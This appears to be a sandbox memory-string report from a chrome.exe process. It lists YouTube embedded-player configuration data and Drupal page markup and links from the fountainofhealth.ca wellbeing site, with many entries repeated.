Source: chrome.exe, 00000000.00000002.2496056454.000028EC048D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Welcome to Thrive Learning3+https://www.youtube.com/watch?v=h15NcT6UXh0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370397956.000028EC03559000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370397956.000028EC03559000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false}EDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323428029.000028EC04BDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323165506.000028EC04C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: \"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: \"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: \"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
Source: chrome.exe, 00000000.00000003.2344000946.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}= [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323398475.000028EC04C3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2356104978.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
